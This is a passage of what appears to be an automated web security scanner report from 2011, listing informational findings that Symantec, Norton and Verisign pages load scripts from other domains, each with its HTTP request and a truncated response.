http://nortonde.i.lithium.com/t5/scripts/1D71204D9D9658792FA0096B2FB2A913/lia-scripts-common-min.js
http://nortonde.i.lithium.com/t5/scripts/FE6BBBDB381DA2F6F1B96A6E926BAF19/lia-scripts-body-min.js
http://www.symantec.com/lib/jsp/headerjs.jsp?lg=de&ct=de&sg=norton&url=/norton/familyresources/index.jsp&domain=www.symantec.com&analytics=n
http://www.symantec.com/script/omniture/om_code.js
http://www.symantec.com/script/omniture/s_code.js

Request

GET / HTTP/1.1
Host: de.community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 59970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>


       <link class="lia-link
...[SNIP]...
<meta name="om.user_id" content="" />

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=de&ct=de&sg=norton&url=/norton/familyresources/index.jsp&domain=www.symantec.com&analytics=n"></"></script>
<link rel="shortcut icon" href="http://www.symantec.com/favicon.ico" type="image/x-icon" />

<script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...

<script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
<script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...



       <script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/1D71204D9D9658792FA0096B2FB2A913/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://nortonde.i.lithium.com/t5/scripts/FE6BBBDB381DA2F6F1B96A6E926BAF19/lia-scripts-body-min.js"></script>
...[SNIP]...

15.6. http://free.pctools.com/free-antivirus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://free.pctools.com
Path:	/free-antivirus/

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/pctools.json?callback=twitterCallback2&count=1

Request

GET /free-antivirus/ HTTP/1.1
Host: free.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 09 Sep 2011 21:42:00 GMT
Date: Fri, 09 Sep 2011 21:42:00 GMT
Content-Length: 17565
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Free AntiVirus & An
...[SNIP]...
</div>
       <script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"></script>
       <script src="http://twitter.com/statuses/user_timeline/pctools.json?callback=twitterCallback2&count=1" type="text/javascript">
...[SNIP]...

15.7. http://investor.symantec.com/phoenix.zhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investor.symantec.com
Path:	/phoenix.zhtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2
http://widgets.twimg.com/j/2/widget.js

Request

GET /phoenix.zhtml?c=89422&p=irol-irhomeNews HTTP/1.1
Host: investor.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.8. https://knowledge.verisign.ch/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/code-signing-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.9. https://knowledge.verisign.ch/support/digital-id-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/digital-id-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"
               type="text/javascript"></script>
...[SNIP]...

15.10. https://knowledge.verisign.ch/support/mpki-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/mpki-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"
               type="text/javascript"></script>
...[SNIP]...

15.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"
               type="text/javascript"></script>
...[SNIP]...

15.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/trust-seal-support/index.html

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.14. http://query.verisign.ch/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://query.verisign.ch
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
https://seal.verisign.com/getseal?host_name=query.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:19 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 43489
Connection: close

<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http
...[SNIP]...
</script>

       <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=query.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...
</div>

       <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>

       <script type="text/javascript" src="//cdn.verisign.com/authweb/global/assets/shared/js/shared.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...

15.15. https://securitycenter.verisign.com/celp/enroll/outsideSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/outsideSearch

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

Response

15.16. https://ssl-certificate-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The response dynamically includes the following scripts from other domains:

https://ssl.google-analytics.com/urchin.js
https://www.verisign.com/js/mbox.js

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.17. https://ssl-certificate-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.18. http://store.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://store.symantec.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js
http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js
http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:30:57 GMT
Content-Length: 18197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">

<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js" type="text/javascript"></script>
<script src="http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js"
type="text/javascript"></script>
...[SNIP]...

<script src="http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

15.19. https://symantec-corporation.com/servlet/campaignrespondent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://symantec-corporation.com
Path:	/servlet/campaignrespondent

Issue detail

The response dynamically includes the following scripts from other domains:

https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=
https://www-secure.symantec.com/script/20080114/swfobject.js
https://www-secure.symantec.com/script/omniture/om_code.js
https://www-secure.symantec.com/script/omniture/s_code.js
https://www-secure.symantec.com/scripts/icrossing/i2a.js
https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js

Request

Response

15.20. https://trust-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The response dynamically includes the following scripts from other domains:

https://ssl.google-analytics.com/urchin.js
https://www.verisign.com/js/mbox.js

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.21. https://trust-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...

15.22. https://trust-center.verisign.com/process/retail/help_and_support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/help_and_support

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.23. https://trust-center.verisign.com/process/retail/trust_product_selector previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

Response

15.24. http://us.norton.com/360 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/360

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /360 HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=679
Date: Fri, 09 Sep 2011 21:47:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107429

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Firewall - Anti Virus - Phishing Protection | Norton 360</title>
<meta http-
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript">
</script>
...[SNIP]...

15.25. http://us.norton.com/downloads/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/downloads/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /downloads/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=3256
Date: Fri, 09 Sep 2011 21:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53856

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Download Norton Internet Security, Antivirus or Norton 360</title>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

15.26. http://us.norton.com/familyresources/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/familyresources/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://www.symantec.com/script/20070727/windowShade.js

Request

GET /familyresources/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=64
Date: Fri, 09 Sep 2011 21:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67586

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Family Resource Center: Internet Safety for Children, Teens &amp; Adults
...[SNIP]...
</div>

<script src="http://www.symantec.com/script/20070727/windowShade.js" language="javascript" type="text/javascript"></script>
...[SNIP]...

15.27. http://us.norton.com/nortonlive/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/nortonlive/

Issue detail

The response dynamically includes the following script from another domain:

http://marchex.voicestar.com/euinc/number-changer.js

Request

GET /nortonlive/ HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Cache-Control: public, max-age=3479
Date: Fri, 09 Sep 2011 21:47:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Computer Support & Computer Tech Support | NortonLive</title>
<meta http
...[SNIP]...
</script>
<script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js"></script>
...[SNIP]...

15.28. http://us.norton.com/nortonlive/spyware-virus-removal.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/nortonlive/spyware-virus-removal.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://marchex.voicestar.com/euinc/number-changer.js

Request

Response

15.29. http://us.norton.com/products/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/products/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /products/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1696
Date: Fri, 09 Sep 2011 21:47:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Protect your computer and remove adware and spyware with Norton 360</title>
<meta http-equiv="Content-Type" content
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

15.30. http://us.norton.com/security_response/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.norton.com
Path:	/security_response/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /security_response/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1815
Date: Fri, 09 Sep 2011 21:47:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67812

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Viruses and Risks - Exploits - Virus Protection | Security Response</title>

...[SNIP]...
</div>

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript"></script>
...[SNIP]...

15.31. http://www.symantec.com/connect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.symantec.com
Path:	/connect/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /connect/ HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:03:21 +0000
Vary: Cookie
ETag: "1315602201"
Content-Type: text/html; charset=utf-8
X-Varnish: 1369354087 1369326710
X-Varnish-Cache: HIT
X-Varnish-Hits: 287
Vary: Accept-Encoding
Content-Length: 80043
Cache-Control: public, max-age=1794
Date: Fri, 09 Sep 2011 21:34:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

15.32. http://www.verisign.ch/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211
